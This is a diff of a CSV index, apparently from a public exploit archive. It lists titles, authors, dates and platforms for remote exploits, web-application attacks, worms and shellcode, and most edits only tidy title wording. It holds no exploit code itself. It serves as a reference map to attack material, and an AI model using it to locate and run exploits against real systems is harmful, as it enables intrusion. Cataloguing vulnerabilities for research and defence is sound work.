38826,platforms/linux/remote/38826.py,"Linux Kernel 3.0.5 - 'ath9k_htc_set_bssid_mask()' Information Disclosure",2013-12-10,"Mathy Vanhoef",linux,remote,0 38827,platforms/php/remote/38827.txt,"Nagios XI - 'tfPassword' SQL Injection",2013-12-13,"Denis Andzakovic",php,remote,0 -38829,platforms/windows/remote/38829.py,"Easy File Sharing Web Server 7.2 - Remote Buffer Overflow (SEH) (DEP Bypass with ROP)",2015-11-30,Knaps,windows,remote,0 +38829,platforms/windows/remote/38829.py,"Easy File Sharing Web Server 7.2 - Remote Buffer Overflow (SEH) (DEP Bypass + ROP)",2015-11-30,Knaps,windows,remote,0 36025,platforms/windows/remote/36025.py,"Achat 0.150 beta7 - Buffer Overflow",2015-02-08,"KAhara MAnhara",windows,remote,0 38845,platforms/multiple/remote/38845.txt,"SKIDATA Freemotion.Gate - Unauthenticated Web Services Multiple Command Execution Vulnerabilities",2013-11-19,"Dennis Kelly",multiple,remote,0 38846,platforms/multiple/remote/38846.txt,"Nginx 1.1.17 - URI Processing SecURIty Bypass",2013-11-19,"Ivan Fratric",multiple,remote,0 @@ -15605,13 +15607,13 @@ id,file,description,date,author,platform,type,port 39643,platforms/java/remote/39643.rb,"Apache Jetspeed - Arbitrary File Upload (Metasploit)",2016-03-31,Metasploit,java,remote,8080 39645,platforms/multiple/remote/39645.php,"PHP 5.5.33/7.0.4 - SNMP Format String",2016-04-01,"Andrew Kramer",multiple,remote,0 39693,platforms/unix/remote/39693.rb,"Dell KACE K1000 - Arbitrary File Upload (Metasploit)",2016-04-13,Metasploit,unix,remote,0 -39698,platforms/windows/remote/39698.html,"Microsoft Internet Explorer 9/10/11 - CDOMStringDataList::InitFromString Out-of-Bounds Read (MS15-112)",2016-04-14,"Ashfaq Ansari",windows,remote,0 +39698,platforms/windows/remote/39698.html,"Microsoft Internet Explorer 9/10/11 - 'CDOMStringDataList::InitFromString' Out-of-Bounds Read (MS15-112)",2016-04-14,"Ashfaq Ansari",windows,remote,0 39708,platforms/multiple/remote/39708.rb,"Novell ServiceDesk - Authenticated Arbitrary File Upload (Metasploit)",2016-04-18,Metasploit,multiple,remote,80 39729,platforms/win_x86/remote/39729.rb,"PCMan FTP Server 2.0.7 - 'RENAME' Buffer Overflow (Metasploit)",2016-04-25,"Jonathan Smith",win_x86,remote,21 39735,platforms/windows/remote/39735.rb,"Advantech Webaccess Dashboard Viewer - Arbitrary File Upload (Metasploit)",2016-04-26,Metasploit,windows,remote,80 39736,platforms/linux/remote/39736.txt,"libgd 2.1.1 - Signedness Heap Overflow",2016-04-26,"Hans Jerry Illikainen",linux,remote,0 39742,platforms/php/remote/39742.txt,"PHP 7.0.5 - ZipArchive::getFrom* Integer Overflow",2016-04-28,"Hans Jerry Illikainen",php,remote,0 -39755,platforms/windows/remote/39755.py,"Acunetix WVS 10 - Remote Command Execution (System)",2016-05-02,"Daniele Linguaglossa",windows,remote,0 +39755,platforms/windows/remote/39755.py,"Acunetix WVS 10 - Remote Command Execution",2016-05-02,"Daniele Linguaglossa",windows,remote,0 39756,platforms/linux/remote/39756.rb,"Apache Struts - Dynamic Method Invocation Remote Code Execution (Metasploit)",2016-05-02,Metasploit,linux,remote,8080 39783,platforms/windows/remote/39783.py,"Dell SonicWALL Scrutinizer 11.0.1 - setUserSkin/deleteTab SQL Injection Remote Code Execution",2016-05-09,mr_me,windows,remote,0 39792,platforms/ruby/remote/39792.rb,"Ruby on Rails - Development Web Console (v2) Code Execution (Metasploit)",2016-05-09,Metasploit,ruby,remote,3000 @@ -15641,12 +15643,12 @@ id,file,description,date,author,platform,type,port 40119,platforms/linux/remote/40119.md,"DropBearSSHD 2015.71 - Command Injection",2016-03-03,tintinweb,linux,remote,0 40120,platforms/hardware/remote/40120.py,"Meinberg NTP Time Server ELX800/GPS M4x V5.30p - Remote Command Execution / Escalate Privileges",2016-07-17,b0yd,hardware,remote,0 40846,platforms/android/remote/40846.html,"Google Android - 'BadKernel' Remote Code Execution",2016-11-28,"Guang Gong",android,remote,0 -40125,platforms/multiple/remote/40125.py,"Axis Communications MPQT/PACS 5.20.x - Server-Side Include (SSI) Daemon Remote Format String",2016-07-19,bashis,multiple,remote,0 +40125,platforms/multiple/remote/40125.py,"Axis Communications MPQT/PACS 5.20.x - Server-Side Include Daemon Remote Format String",2016-07-19,bashis,multiple,remote,0 40130,platforms/php/remote/40130.rb,"Drupal Module RESTWS 7.x - PHP Remote Code Execution (Metasploit)",2016-07-20,"Mehmet Ince",php,remote,80 40136,platforms/linux/remote/40136.py,"OpenSSH 7.2p2 - Username Enumeration",2016-07-20,0_o,linux,remote,22 40138,platforms/windows/remote/40138.py,"TFTP Server 1.4 - 'WRQ' Buffer Overflow (Egghunter)",2016-07-21,"Karn Ganeshen",windows,remote,69 40142,platforms/php/remote/40142.php,"Apache 2.4.7 + PHP 7.0.2 - 'openssl_seal()' Uninitialized Memory Code Execution",2016-02-01,akat1,php,remote,0 -40144,platforms/php/remote/40144.php,"Drupal Module Coder < 7.x-1.3/7.x-2.6 - Remote Code Execution (SA-CONTRIB-2016-039)",2016-07-23,Raz0r,php,remote,0 +40144,platforms/php/remote/40144.php,"Drupal Module Coder < 7.x-1.3/7.x-2.6 - Remote Code Execution",2016-07-23,Raz0r,php,remote,0 40146,platforms/linux/remote/40146.rb,"Barracuda Web App Firewall 8.0.1.007/Load Balancer 5.4.0.004 - Remote Command Execution (Metasploit)",2016-07-25,xort,linux,remote,8000 40147,platforms/linux/remote/40147.rb,"Barracuda Spam & Virus Firewall 5.1.3.007 - Remote Command Execution (Metasploit)",2016-07-25,xort,linux,remote,8000 40162,platforms/linux/remote/40162.rb,"Barracuda Web App Firewall 8.0.1.007/Load Balancer 5.4.0.004 - Authenticated Remote Command Execution (Metasploit)",2016-07-26,xort,linux,remote,8000 @@ -15931,6 +15933,7 @@ id,file,description,date,author,platform,type,port 43055,platforms/hardware/remote/43055.rb,"Netgear DGN1000 1.1.00.48 - 'Setup.cgi' Unauthenticated Remote Code Execution (Metasploit)",2017-10-25,Metasploit,hardware,remote,0 43059,platforms/windows/remote/43059.py,"DameWare Remote Controller < 12.0.0.520 - Remote Code Execution",2016-04-03,Securifera,windows,remote,0 43061,platforms/hardware/remote/43061.txt,"MitraStar DSL-100HN-T1/GPT-2541GNAC - Privilege Escalation",2017-10-28,j0lama,hardware,remote,0 +43105,platforms/hardware/remote/43105.txt,"ZyXEL PK5001Z Modem - Backdoor Account",2017-10-31,"Matthew Sheimo",hardware,remote,0 14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) + execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0 13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0 13242,platforms/bsd/shellcode/13242.txt,"BSD - Reverse TCP /bin/sh Shell (127.0.0.1:31337/TCP) Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0 @@ -16602,7 +16605,7 @@ id,file,description,date,author,platform,type,port 430,platforms/php/webapps/430.txt,"TorrentTrader 1.0 RC2 - SQL Injection",2004-09-01,aCiDBiTS,php,webapps,0 436,platforms/php/webapps/436.txt,"PHP-Nuke 7.4 - Privilege Escalation",2004-09-08,mantra,php,webapps,0 464,platforms/cgi/webapps/464.txt,"Turbo Seek - Null Byte Error Discloses Files",2004-09-13,durito,cgi,webapps,0 -465,platforms/php/webapps/465.pl,"PHP-Nuke - SQL Injection Edit/Save Message(s)",2004-09-16,iko94,php,webapps,0 +465,platforms/php/webapps/465.pl,"PHP-Nuke - SQL Injection Edit/Save Messages",2004-09-16,iko94,php,webapps,0 561,platforms/php/webapps/561.sh,"S9Y Serendipity 0.7-beta1 - SQL Injection (PoC)",2004-09-28,aCiDBiTS,php,webapps,0 565,platforms/php/webapps/565.txt,"Silent Storm Portal - Multiple Vulnerabilities",2004-09-30,"CHT Security Research",php,webapps,0 570,platforms/php/webapps/570.txt,"WordPress 1.2 - HTTP Splitting",2004-10-10,"Tenable NS",php,webapps,0 @@ -16618,13 +16621,13 @@ id,file,description,date,author,platform,type,port 673,platforms/php/webapps/673.pl,"phpBB 2.0.10 - Remote Command Execution (CGI)",2004-12-03,ZzagorR,php,webapps,0 676,platforms/php/webapps/676.c,"phpBB 1.0.0/2.0.10 - 'admin_cash.php' Remote Exploit",2004-12-05,evilrabbi,php,webapps,0 697,platforms/php/webapps/697.c,"PHP 4.3.9 + phpBB 2.x - 'Unserialize()' Remote Exploit",2004-12-17,overdose,php,webapps,0 -702,platforms/php/webapps/702.pl,"phpBB - highlight Arbitrary File Upload (Santy.A)",2004-12-22,anonymous,php,webapps,0 +702,platforms/php/webapps/702.pl,"phpBB - highlight Arbitrary File Upload 'Santy.A'",2004-12-22,anonymous,php,webapps,0 703,platforms/php/webapps/703.pl,"phpMyChat 0.14.5 - Remote Improper File Permissions Exploit",2004-12-22,sysbug,php,webapps,0 704,platforms/php/webapps/704.pl,"e107 - 'include()' Remote Exploit",2004-12-22,sysbug,php,webapps,80 720,platforms/php/webapps/720.pl,"Sanity.b - phpBB 2.0.10 Bot Install (AOL/Yahoo Search)",2004-12-25,anonymous,php,webapps,0 725,platforms/php/webapps/725.pl,"PHPInclude.Worm - PHP Scripts Automated Arbitrary File Inclusion",2004-12-25,anonymous,php,webapps,0 737,platforms/php/webapps/737.txt,"QwikiWiki - Directory Traversal",2005-01-04,Madelman,php,webapps,0 -740,platforms/php/webapps/740.pl,"phpBB 2.0.10 - Bot Install (Altavista) (ssh.D.Worm)",2005-01-04,"Severino Honorato",php,webapps,0 +740,platforms/php/webapps/740.pl,"phpBB 2.0.10 - Bot Install Altavista 'ssh.D.Worm'",2005-01-04,"Severino Honorato",php,webapps,0 754,platforms/php/webapps/754.pl,"ITA Forum 1.49 - SQL Injection",2005-01-13,RusH,php,webapps,0 772,platforms/cgi/webapps/772.c,"AWStats 6.0 < 6.2 - configdir Remote Command Execution (C)",2005-01-25,THUNDER,cgi,webapps,0 773,platforms/cgi/webapps/773.pl,"AWStats 6.0 < 6.2 - configdir Remote Command Execution (Perl)",2005-01-25,GHC,cgi,webapps,0 @@ -16680,7 +16683,7 @@ id,file,description,date,author,platform,type,port 1011,platforms/asp/webapps/1011.php,"Maxwebportal 1.36 - 'Password.asp' Change Password (2) (PHP)",2005-05-26,mh_p0rtal,asp,webapps,0 1012,platforms/asp/webapps/1012.txt,"Maxwebportal 1.36 - 'Password.asp' Change Password (1) (HTML)",2005-05-26,"Soroush Dalili",asp,webapps,0 1013,platforms/php/webapps/1013.pl,"Invision Power Board 2.0.3 - 'login.php' SQL Injection",2005-05-26,"Petey Beege",php,webapps,0 -1014,platforms/php/webapps/1014.txt,"Invision Power Board 2.0.3 - 'login.php' SQL Injection (tutorial)",2005-05-27,"Danica Jones",php,webapps,0 +1014,platforms/php/webapps/1014.txt,"Invision Power Board 2.0.3 - 'login.php' SQL Injection",2005-05-27,"Danica Jones",php,webapps,0 1015,platforms/asp/webapps/1015.txt,"Hosting Controller 0.6.1 - Unauthenticated User Registration (3)",2005-05-27,"Soroush Dalili",asp,webapps,0 1016,platforms/php/webapps/1016.pl,"phpStat 1.5 - 'setup.php' Authentication Bypass (Perl)",2005-05-30,Alpha_Programmer,php,webapps,0 1017,platforms/php/webapps/1017.php,"phpStat 1.5 - 'setup.php' Authentication Bypass (PHP) (1)",2005-05-30,mh_p0rtal,php,webapps,0 @@ -16721,7 +16724,7 @@ id,file,description,date,author,platform,type,port 1088,platforms/php/webapps/1088.pl,"Drupal 4.5.3 < 4.6.1 - Comments PHP Injection",2005-07-05,dab,php,webapps,0 1095,platforms/php/webapps/1095.txt,"phpBB 2.0.16 - Cross-Site Scripting Remote Cookie Disclosure",2005-07-08,D|ablo,php,webapps,0 1097,platforms/php/webapps/1097.txt,"BlogTorrent 0.92 - Remote Password Disclosure",2005-07-11,LazyCrs,php,webapps,0 -1103,platforms/php/webapps/1103.txt,"phpBB 2.0.16 - Cross-Site Scripting Remote Cookie Disclosure (cookie grabber)",2005-07-13,"Sjaak Rake",php,webapps,0 +1103,platforms/php/webapps/1103.txt,"phpBB 2.0.16 - Cross-Site Scripting Remote Cookie Disclosure (Cookie Grabber)",2005-07-13,"Sjaak Rake",php,webapps,0 1106,platforms/php/webapps/1106.txt,"e107 0.617 - Cross-Site Scripting Remote Cookie Disclosure",2005-07-14,warlord,php,webapps,0 1111,platforms/php/webapps/1111.pl,"Open Bulletin Board 1.0.5 - SQL Injection",2005-07-18,RusH,php,webapps,0 1112,platforms/asp/webapps/1112.txt,"Hosting Controller 6.1 HotFix 2.2 - Add Domain without Quota Exploit",2005-07-18,"Soroush Dalili",asp,webapps,0 @@ -16734,7 +16737,7 @@ id,file,description,date,author,platform,type,port 1142,platforms/php/webapps/1142.php,"WordPress 1.5.1.3 - Remote Code Execution",2005-08-09,Kartoffelguru,php,webapps,0 1145,platforms/php/webapps/1145.pm,"WordPress 1.5.1.3 - Remote Code Execution (Metasploit)",2005-08-10,str0ke,php,webapps,0 1172,platforms/php/webapps/1172.pl,"MyBulletinBoard (MyBB) 1.00 RC4 - 'search.php' SQL Injection",2005-08-22,Alpha_Programmer,php,webapps,0 -1189,platforms/php/webapps/1189.c,"vBulletin 3.0.8 - Accessible Database Backup Searcher (update 3)",2005-08-31,str0ke,php,webapps,0 +1189,platforms/php/webapps/1189.c,"vBulletin 3.0.8 - Accessible Database Backup Searcher (3)",2005-08-31,str0ke,php,webapps,0 1191,platforms/php/webapps/1191.pl,"Simple PHP Blog 0.4.0 - Multiple Remote Exploits",2005-09-01,"Kenneth Belva",php,webapps,0 1194,platforms/cgi/webapps/1194.c,"man2web 0.88 - Multiple Remote Command Executions (2)",2005-09-04,tracewar,cgi,webapps,0 1200,platforms/php/webapps/1200.php,"PBLang 4.65 - Remote Command Execution (1)",2005-09-07,rgod,php,webapps,0 @@ -16762,7 +16765,7 @@ id,file,description,date,author,platform,type,port 1278,platforms/php/webapps/1278.pl,"Subdreamer 2.2.1 - SQL Injection / Command Execution",2005-10-31,RusH,php,webapps,0 1280,platforms/php/webapps/1280.pl,"VuBB Forum RC1 - 'm' SQL Injection",2005-11-02,Devil-00,php,webapps,0 1289,platforms/php/webapps/1289.php,"CuteNews 1.4.1 - Shell Injection / Remote Command Execution",2005-11-03,rgod,php,webapps,0 -1296,platforms/php/webapps/1296.txt,"ibProArcade 2.x - module (vBulletin/IPB) SQL Injection",2005-11-06,B~HFH,php,webapps,0 +1296,platforms/php/webapps/1296.txt,"ibProArcade 2.x - module 'vBulletin/IPB' SQL Injection",2005-11-06,B~HFH,php,webapps,0 1298,platforms/php/webapps/1298.php,"ATutor 1.5.1pl2 - SQL Injection / Command Execution",2005-11-07,rgod,php,webapps,0 1312,platforms/php/webapps/1312.php,"Moodle 1.6dev - SQL Injection / Command Execution",2005-11-10,rgod,php,webapps,0 1315,platforms/php/webapps/1315.php,"XOOPS (wfdownloads) 2.05 Module - Multiple Vulnerabilities",2005-11-12,rgod,php,webapps,0 @@ -16783,7 +16786,7 @@ id,file,description,date,author,platform,type,port 1358,platforms/php/webapps/1358.php,"SimpleBBS 1.1 - Remote Commands Execution Exploit",2005-12-06,rgod,php,webapps,0 1359,platforms/php/webapps/1359.php,"SugarSuite Open Source 4.0beta - Remote Code Execution (1)",2005-12-07,rgod,php,webapps,0 1361,platforms/php/webapps/1361.c,"SimpleBBS 1.1 - Remote Commands Execution Exploit (C)",2005-12-07,unitedasia,php,webapps,0 -1363,platforms/php/webapps/1363.php,"Website Baker 2.6.0 - Login Bypass / Remote Code Execution",2005-12-08,rgod,php,webapps,0 +1363,platforms/php/webapps/1363.php,"Website Baker 2.6.0 - Authentication Bypass / Remote Code Execution",2005-12-08,rgod,php,webapps,0 1364,platforms/php/webapps/1364.c,"SugarSuite Open Source 4.0beta - Remote Code Execution (2)",2005-12-08,pointslash,php,webapps,0 1367,platforms/php/webapps/1367.php,"Flatnuke 2.5.6 - Privilege Escalation / Remote Commands Execution",2005-12-10,rgod,php,webapps,0 1370,platforms/php/webapps/1370.php,"phpCOIN 1.2.2 - 'phpcoinsessid' SQL Injection / Remote Code Execution",2005-12-12,rgod,php,webapps,0 @@ -16796,7 +16799,7 @@ id,file,description,date,author,platform,type,port 1388,platforms/php/webapps/1388.pl,"phpBB 2.0.17 - 'signature_bbcode_uid' Remote Command Exploit",2005-12-24,RusH,php,webapps,0 1395,platforms/php/webapps/1395.php,"phpDocumentor 1.3.0 rc4 - Remote Commands Execution Exploit",2005-12-29,rgod,php,webapps,0 1398,platforms/php/webapps/1398.pl,"CubeCart 3.0.6 - Remote Command Execution",2005-12-30,cijfer,php,webapps,0 -1399,platforms/asp/webapps/1399.txt,"WebWiz Products 1.0/3.06 - Login Bypass (SQL Injection)",2005-12-30,DevilBox,asp,webapps,0 +1399,platforms/asp/webapps/1399.txt,"WebWiz Products 1.0/3.06 - Authentication Bypass / SQL Injection",2005-12-30,DevilBox,asp,webapps,0 1400,platforms/php/webapps/1400.pl,"CuteNews 1.4.1 - 'categories.mdu' Remote Command Execution",2006-01-01,cijfer,php,webapps,0 1401,platforms/php/webapps/1401.pl,"Valdersoft Shopping Cart 3.0 - Remote Command Execution",2006-01-03,cijfer,php,webapps,0 1405,platforms/php/webapps/1405.pl,"FlatCMS 1.01 - 'file_editor.php' Remote Command Execution",2006-01-04,cijfer,php,webapps,0 @@ -16852,7 +16855,7 @@ id,file,description,date,author,platform,type,port 1541,platforms/php/webapps/1541.pl,"Limbo CMS 1.0.4.2 - 'itemID' Remote Code Execution",2006-03-01,str0ke,php,webapps,0 1542,platforms/php/webapps/1542.pl,"phpRPC Library 0.7 - XML Data Decoding Remote Code Execution (1)",2006-03-01,LorD,php,webapps,0 1543,platforms/php/webapps/1543.pl,"vuBB 0.2 - 'cookie' Final SQL Injection 'mq=off'",2006-03-01,KingOfSka,php,webapps,0 -1544,platforms/php/webapps/1544.pl,"Woltlab Burning Board 2.x - Datenbank MOD (fileid) SQL Injection",2006-03-01,nukedx,php,webapps,0 +1544,platforms/php/webapps/1544.pl,"Woltlab Burning Board 2.x - Datenbank MOD 'fileid' SQL Injection",2006-03-01,nukedx,php,webapps,0 1546,platforms/php/webapps/1546.pl,"phpRPC Library 0.7 - XML Data Decoding Remote Code Execution (2)",2006-03-02,cijfer,php,webapps,0 1547,platforms/php/webapps/1547.txt,"Aztek Forum 4.00 - Cross-Site Scripting / SQL Injection",2006-03-02,lorenzo,php,webapps,0 1548,platforms/php/webapps/1548.pl,"MyBulletinBoard (MyBB) 1.04 - 'misc.php' SQL Injection (2)",2006-03-03,Devil-00,php,webapps,0 @@ -17002,9 +17005,9 @@ id,file,description,date,author,platform,type,port 1814,platforms/php/webapps/1814.txt,"UBBCentral UBB.Threads 6.4.x < 6.5.2 - 'thispath' Remote File Inclusion",2006-05-22,V4mu,php,webapps,0 1816,platforms/php/webapps/1816.php,"Nucleus CMS 3.22 - 'DIR_LIBS' Remote File Inclusion",2006-05-23,rgod,php,webapps,0 1817,platforms/php/webapps/1817.txt,"Docebo 3.0.3 - Multiple Remote File Inclusions",2006-05-23,Kacper,php,webapps,0 -1818,platforms/php/webapps/1818.txt,"phpCommunityCalendar 4.0.3 - Multiple (Cross-Site Scripting / SQL Injection) Vulnerabilities",2006-05-23,X0r_1,php,webapps,0 +1818,platforms/php/webapps/1818.txt,"phpCommunityCalendar 4.0.3 - Cross-Site Scripting / SQL Injection",2006-05-23,X0r_1,php,webapps,0 1821,platforms/php/webapps/1821.php,"Drupal 4.7 - 'Attachment mod_mime' Remote Exploit",2006-05-24,rgod,php,webapps,0 -1823,platforms/php/webapps/1823.txt,"BASE 1.2.4 - melissa (Snort Frontend) Remote File Inclusion",2006-05-25,str0ke,php,webapps,0 +1823,platforms/php/webapps/1823.txt,"BASE 1.2.4 - melissa Snort Frontend Remote File Inclusion",2006-05-25,str0ke,php,webapps,0 1824,platforms/php/webapps/1824.txt,"open-medium.CMS 0.25 - '404.php' Remote File Inclusion",2006-05-25,Kacper,php,webapps,0 1825,platforms/php/webapps/1825.txt,"Back-End CMS 0.7.2.2 - 'BE_config.php' Remote File Inclusion",2006-05-25,Kacper,php,webapps,0 1826,platforms/php/webapps/1826.txt,"Socketmail 2.2.6 - 'site_path' Remote File Inclusion",2006-05-25,Aesthetico,php,webapps,0 @@ -17657,7 +17660,7 @@ id,file,description,date,author,platform,type,port 2684,platforms/asp/webapps/2684.txt,"Techno Dreams Guestbook 1.0 - 'key' SQL Injection",2006-10-30,ajann,asp,webapps,0 2685,platforms/php/webapps/2685.php,"Nitrotech 0.0.3a - Remote Code Execution",2006-10-30,Kacper,php,webapps,0 2686,platforms/php/webapps/2686.php,"phpBB Spider Friendly Module 1.3.10 - Remote File Inclusion",2006-10-30,Kacper,php,webapps,0 -2687,platforms/php/webapps/2687.htm,"E Annu 1.0 - Login Bypass (SQL Injection)",2006-10-30,ajann,php,webapps,0 +2687,platforms/php/webapps/2687.htm,"E Annu 1.0 - Authentication Bypass / SQL Injection",2006-10-30,ajann,php,webapps,0 2688,platforms/php/webapps/2688.txt,"phpProfiles 2.1 Beta - Multiple Remote File Inclusions",2006-10-30,v1per-haCker,php,webapps,0 2691,platforms/php/webapps/2691.txt,"P-Book 1.17 - 'pb_lang' Remote File Inclusion",2006-10-31,Matdhule,php,webapps,0 2692,platforms/php/webapps/2692.txt,"GEPI 1.4.0 - '/gestion/savebackup.php' Remote File Inclusion",2006-10-31,"Sumit Siddharth",php,webapps,0 @@ -17728,7 +17731,7 @@ id,file,description,date,author,platform,type,port 2776,platforms/php/webapps/2776.txt,"ContentNow 1.30 - Arbitrary File Upload / Cross-Site Scripting",2006-11-14,Timq,php,webapps,0 2777,platforms/php/webapps/2777.txt,"Aigaion 1.2.1 - 'DIR' Remote File Inclusion",2006-11-14,navairum,php,webapps,0 2778,platforms/php/webapps/2778.txt,"PHPPeanuts 1.3 Beta - 'Inspect.php' Remote File Inclusion",2006-11-14,"Hidayat Sagita",php,webapps,0 -2779,platforms/asp/webapps/2779.txt,"ASP Smiley 1.0 - 'default.asp' Login Bypass 'SQL Injection'",2006-11-14,ajann,asp,webapps,0 +2779,platforms/asp/webapps/2779.txt,"ASP Smiley 1.0 - 'default.asp' Authentication Bypass / SQL Injection",2006-11-14,ajann,asp,webapps,0 2780,platforms/asp/webapps/2780.txt,"NetVIOS 2.0 - 'page.asp' SQL Injection",2006-11-14,ajann,asp,webapps,0 2781,platforms/asp/webapps/2781.txt,"blogme 3.0 - Cross-Site Scripting / Authentication Bypass",2006-11-14,"Security Access Point",asp,webapps,0 2782,platforms/asp/webapps/2782.txt,"Hpecs Shopping Cart - Remote Authentication Bypass",2006-11-14,"Security Access Point",asp,webapps,0 @@ -17805,7 +17808,7 @@ id,file,description,date,author,platform,type,port 2896,platforms/php/webapps/2896.txt,"Tucows Client Code Suite (CSS) 1.2.1015 - Remote File Inclusion",2006-12-08,3l3ctric-Cracker,php,webapps,0 2897,platforms/php/webapps/2897.txt,"CM68 News 12.02.06 - 'addpth' Remote File Inclusion",2006-12-08,"Paul Bakoyiannis",php,webapps,0 2898,platforms/php/webapps/2898.txt,"ThinkEdit 1.9.2 - 'render.php' Remote File Inclusion",2006-12-08,r0ut3r,php,webapps,0 -2899,platforms/php/webapps/2899.txt,"paFileDB 3.5.2/3.5.3 - Remote Login Bypass (SQL Injection)",2006-12-08,koray,php,webapps,0 +2899,platforms/php/webapps/2899.txt,"paFileDB 3.5.2/3.5.3 - Remote Authentication Bypass / SQL Injection",2006-12-08,koray,php,webapps,0 2902,platforms/php/webapps/2902.pl,"TorrentFlux 2.2 - 'downloaddetails.php' Local File Disclosure",2006-12-09,r0ut3r,php,webapps,0 2903,platforms/php/webapps/2903.pl,"TorrentFlux 2.2 - 'maketorrent.php' Remote Command Execution",2006-12-09,r0ut3r,php,webapps,0 2904,platforms/php/webapps/2904.txt,"mxBB Module Profile CP 0.91c - Remote File Inclusion",2006-12-09,bd0rk,php,webapps,0 @@ -18311,7 +18314,7 @@ id,file,description,date,author,platform,type,port 3717,platforms/php/webapps/3717.txt,"WebKalk2 1.9.0 - 'absolute_path' Remote File Inclusion",2007-04-12,GoLd_M,php,webapps,0 3718,platforms/php/webapps/3718.txt,"RicarGBooK 1.2.1 - 'lang' Local File Inclusion",2007-04-12,Dj7xpl,php,webapps,0 3719,platforms/php/webapps/3719.pl,"MyBulletinBoard (MyBB) 1.2.2 - 'CLIENT-IP' SQL Injection",2007-04-12,Elekt,php,webapps,0 -3721,platforms/php/webapps/3721.pl,"e107 0.7.8 - 'mailout.php' Access Escalation Exploit (Admin needed)",2007-04-12,Gammarays,php,webapps,0 +3721,platforms/php/webapps/3721.pl,"e107 0.7.8 - 'mailout.php' Authenticated Access Escalation Exploit",2007-04-12,Gammarays,php,webapps,0 3722,platforms/php/webapps/3722.txt,"Expow 0.8 - 'autoindex.php?cfg_file' Remote File Inclusion",2007-04-12,mdx,php,webapps,0 3723,platforms/php/webapps/3723.txt,"Request It 1.0b - 'index.php?id' Remote File Inclusion",2007-04-12,hackberry,php,webapps,0 3725,platforms/php/webapps/3725.php,"Chatness 2.5.3 - '/options.php/save.php' Remote Code Execution",2007-04-12,Gammarays,php,webapps,0 @@ -18422,7 +18425,7 @@ id,file,description,date,author,platform,type,port 3887,platforms/php/webapps/3887.pl,"TutorialCMS 1.00 - 'search.php?search' SQL Injection",2007-05-09,Silentz,php,webapps,0 3894,platforms/php/webapps/3894.txt,"Original 0.11 - 'config.inc.php?x[1]' Remote File Inclusion",2007-05-10,GoLd_M,php,webapps,0 3895,platforms/php/webapps/3895.txt,"Thyme Calendar 1.3 - SQL Injection",2007-05-10,warlord,php,webapps,0 -3896,platforms/php/webapps/3896.pl,"TaskDriver 1.2 - Login Bypass / SQL Injection",2007-05-10,Silentz,php,webapps,0 +3896,platforms/php/webapps/3896.pl,"TaskDriver 1.2 - Authentication Bypass / SQL Injection",2007-05-10,Silentz,php,webapps,0 3900,platforms/php/webapps/3900.php,"Snaps! Gallery 1.4.4 - Remote User Pass Change Exploit",2007-05-11,Dj7xpl,php,webapps,0 3901,platforms/php/webapps/3901.txt,"maGAZIn 2.0 - 'PHPThumb.php?src' Remote File Disclosure",2007-05-11,Dj7xpl,php,webapps,0 3902,platforms/php/webapps/3902.txt,"R2K Gallery 1.7 - 'galeria.php?lang2' Local File Inclusion",2007-05-11,Dj7xpl,php,webapps,0 @@ -18640,7 +18643,7 @@ id,file,description,date,author,platform,type,port 4278,platforms/php/webapps/4278.txt,"Pixlie 1.7 - 'pixlie.php?root' Remote File Disclosure",2007-08-10,Rizgar,php,webapps,0 4282,platforms/php/webapps/4282.txt,"SOTEeSKLEP 3.5RC9 - 'file' Remote File Disclosure",2007-08-13,dun,php,webapps,0 4284,platforms/php/webapps/4284.txt,"Prozilla Webring Website Script - 'category.php?cat' SQL Injection",2007-08-13,t0pP8uZz,php,webapps,0 -4286,platforms/cgi/webapps/4286.txt,"IBM Rational ClearQuest - Web Login Bypass (SQL Injection)",2007-08-14,s4squatch,cgi,webapps,0 +4286,platforms/cgi/webapps/4286.txt,"IBM Rational ClearQuest - Web Authentication Bypass / SQL Injection",2007-08-14,s4squatch,cgi,webapps,0 4291,platforms/php/webapps/4291.txt,"GetMyOwnArcade - 'search.php?query' SQL Injection",2007-08-16,RoXur777,php,webapps,0 4295,platforms/php/webapps/4295.txt,"Squirrelcart 1.x.x - 'cart.php' Remote File Inclusion",2007-08-19,ShaiMagal,php,webapps,0 4296,platforms/php/webapps/4296.txt,"Mambo Component SimpleFAQ 2.11 - SQL Injection",2007-08-20,k1tk4t,php,webapps,0 @@ -19434,7 +19437,7 @@ id,file,description,date,author,platform,type,port 5426,platforms/php/webapps/5426.txt,"RX Maxsoft - 'fotoID' SQL Injection",2008-04-10,S@BUN,php,webapps,0 5428,platforms/php/webapps/5428.txt,"PHPKB Knowledge Base Software 1.5 - 'ID' SQL Injection",2008-04-11,parad0x,php,webapps,0 5429,platforms/php/webapps/5429.txt,"NewsOffice 1.1 - Remote File Inclusion",2008-04-11,RoMaNcYxHaCkEr,php,webapps,0 -5431,platforms/php/webapps/5431.txt,"Joomla! Component JoomlaXplorer 1.6.2 - Remote Vulnerabilities",2008-04-11,Houssamix,php,webapps,0 +5431,platforms/php/webapps/5431.txt,"Joomla! Component JoomlaXplorer 1.6.2 - Remote Exploits",2008-04-11,Houssamix,php,webapps,0 5432,platforms/php/webapps/5432.txt,"PHPAddressBook 2.11 - 'view.php' SQL Injection",2008-04-11,Cr@zy_King,php,webapps,0 5433,platforms/php/webapps/5433.txt,"CcMail 1.0.1 - Insecure Cookie Handling",2008-04-12,t0pP8uZz,php,webapps,0 5434,platforms/php/webapps/5434.pl,"1024 CMS 1.4.2 - Local File Inclusion / Blind SQL Injection",2008-04-13,girex,php,webapps,0 @@ -19635,7 +19638,7 @@ id,file,description,date,author,platform,type,port 5670,platforms/php/webapps/5670.txt,"RoomPHPlanning 1.5 - 'idresa' SQL Injection",2008-05-24,His0k4,php,webapps,0 5671,platforms/php/webapps/5671.txt,"PHPRaider 1.0.7 - 'PHPbb3.functions.php' Remote File Inclusion",2008-05-24,Kacak,php,webapps,0 5672,platforms/php/webapps/5672.txt,"plusphp url shortening software 1.6 - Remote File Inclusion",2008-05-25,DR.TOXIC,php,webapps,0 -5673,platforms/php/webapps/5673.txt,"Xomol CMS 1.2 - Login Bypass / Local File Inclusion",2008-05-25,DNX,php,webapps,0 +5673,platforms/php/webapps/5673.txt,"Xomol CMS 1.2 - Authentication Bypass / Local File 